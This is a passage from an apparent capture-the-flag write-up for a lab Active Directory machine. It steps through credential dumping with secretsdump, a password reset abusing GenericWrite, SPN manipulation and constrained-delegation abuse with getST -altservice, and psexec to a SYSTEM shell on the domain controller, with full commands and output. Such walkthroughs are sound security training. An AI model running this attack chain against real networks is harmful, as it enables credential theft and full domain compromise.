C:\WINDOWS\system32> whoami
nt authority\system

Privilege Escalation

Recovering a.white’s Credentials

With SYSTEM on WEB01, run secretsdump to extract locally cached credentials. The DefaultPassword entry reveals a.white‘s plaintext password:

1
2
3
4
5
6
7
8
9
$ sudo proxychains4 -q -f /etc/proxychains4-1.conf impacket-secretsdump -k -no-pass WEB01.pirate.htb
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

<--SNIP-->

[*] DefaultPassword 
PIRATE\a.white:E2nvAOKSz5Xz2MJu

<--SNIP-->

Abusing GenericWrite to Reset a.white_adm’s Password

BloodHound analysis shows that a.white has the ability to modify a.white_adm‘s password. Since a.white_adm is a Kerberoast candidate with constrained delegation and is a member of the IT group, resetting its password gives us a much more privileged account:

1
2
$ bloodyAD --host pirate.htb -d pirate.htb -u 'a.white' -p 'E2nvAOKSz5Xz2MJu' set password a.white_adm 'Password@123'
[+] Password changed successfully!

SPN Manipulation for Constrained Delegation Abuse

a.white_adm has constrained delegation configured (noted in the Kerberoast output). The plan is to:

  1. Add HTTP/web01.pirate.htb as an SPN on WEB01$ — this registers a legitimate SPN the KDC will accept.
  2. Add the same SPN to DC01$ — this creates a duplicate SPN pointing to the DC, allowing us to redirect a delegated ticket toward DC01.
  3. Use getST with -altservice to obtain a ticket for cifs/DC01 by abusing the delegation chain.

Add HTTP/web01.pirate.htb to WEB01$:

1
2
3
4
5
6
$ addspn -u 'pirate.htb\a.white_adm' -p 'Password@123' -t 'WEB01$' -s 'http/web01.pirate.htb' -r pirate.htb
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[+] Found modification target
[+] SPN Modified successfully

Add the same SPN to DC01$ to redirect authentication toward the DC:

1
2
3
4
5
6
$ addspn -u 'pirate.htb\a.white_adm' -p 'Password@123' -t 'DC01$' -s 'http/web01.pirate.htb' pirate.htb
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[+] Found modification target
[+] SPN Modified successfully

Obtaining a Ticket for DC01

Use getST with -altservice to impersonate Administrator against http/web01.pirate.htb and rewrite the service to cifs/dc01.pirate.htb. The clock skew needs fixing again before this succeeds:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
$ impacket-getST -spn 'http/web01.pirate.htb' -impersonate 'Administrator' 'pirate.htb/a.white_adm:Password@123' -dc-ip pirate.htb -altservice 'cifs/dc01.pirate.htb'
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Getting TGT for user
Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
                                                                                                                  
$ sudo ntpdate -u pirate.htb         
[sudo] password for kali: 
2026-03-06 14:22:16.985185 (-0500) +316.147590 +/- 0.051894 pirate.htb 10.129.1.9 s1 no-leap
CLOCK: time stepped by 316.147590
                                                                                                                  
$ impacket-getST -spn 'http/web01.pirate.htb' -impersonate 'Administrator' 'pirate.htb/a.white_adm:Password@123' -dc-ip pirate.htb -altservice 'cifs/dc01.pirate.htb'
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Getting TGT for user
[*] Impersonating Administrator
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Changing service from http/web01.pirate.htb@PIRATE.HTB to cifs/dc01.pirate.htb@PIRATE.HTB
[*] Saving ticket in Administrator@cifs_dc01.pirate.htb@PIRATE.HTB.ccache

Root Flag

Export the ticket and connect to DC01 as SYSTEM:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
$ export KRB5CCNAME=Administrator@cifs_dc01.pirate.htb@PIRATE.HTB.ccache
                                                                                                                  
$ impacket-psexec -k -no-pass dc01.pirate.htb                           
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Requesting shares on dc01.pirate.htb.....
[*] Found writable share ADMIN$
[*] Uploading file llqXPnCp.exe
[*] Opening SVCManager on dc01.pirate.htb.....
[*] Creating service jlfX on dc01.pirate.htb.....
[*] Starting service jlfX.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.8385]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>